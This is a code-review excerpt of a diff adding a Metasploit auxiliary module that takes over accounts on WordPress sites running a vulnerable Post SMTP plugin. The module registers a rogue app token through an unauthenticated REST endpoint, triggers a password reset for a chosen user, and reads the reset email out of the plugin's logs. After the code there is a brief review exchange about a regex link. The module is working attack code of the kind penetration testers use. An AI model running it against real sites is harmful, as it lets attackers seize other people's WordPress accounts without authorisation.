modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb

```diff
@@ -0,0 +1,116 @@
+    )
+  end
+
+  def register_token
+    token = Rex::Text.rand_text_alphanumeric(10..16)
+    device = Rex::Text.rand_text_alphanumeric(10..16)
+    vprint_status("Attempting to Registering token #{token} on device #{device}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'connect-app'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'fcm-token' => token, 'device' => device }
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200 # 404 if the URL structure is wonky, 401 not vulnerable
+    print_good("Succesfully created token: #{token}")
+    return token, device
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('post-smtp', '2.8.7')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('POST SMTP version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def run
+    fail_with(Failure::NotFound, "#{datastore['USERNAME']} not found on this wordpress install") unless wordpress_user_exists? datastore['USERNAME']
+    token, device = register_token
+    fail_with(Failure::UnexpectedReply, "Password reset for #{datastore['USERNAME']} failed") unless reset_user_password(datastore['USERNAME'])
+    print_status('Requesting logs')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'get-logs'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'fcm-token' => token, 'device' => device }
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+    json_doc = res.get_json_document
+    # we want the latest email as that's the one with the password reset
+    doc_id = json_doc['data'][0]['id']
+    print_status("Requesting email content from logs for ID #{doc_id}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => { 'fcm-token' => token, 'device' => device },
+      'vars_get' => { 'access_token' => token, 'type' => 'log', 'log_id' => doc_id }
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+
+    path = store_loot(
+      'wordpress.post_smtp.log',
+      'text/plain',
+      rhost,
+      res.body,
+      "#{doc_id}.log"
+    )
+    print_good("Full text of log saved to: #{path}")
+    # https://rubular.com/r/DDQpKElcH42Qxg
```

Comment:
Maybe puts everything as a comment here, in case rubular goes down at some point in the future.

Reply:
its possible, but its also been around for 17yrs. Looking through framework, apparently I'm the only one who does that though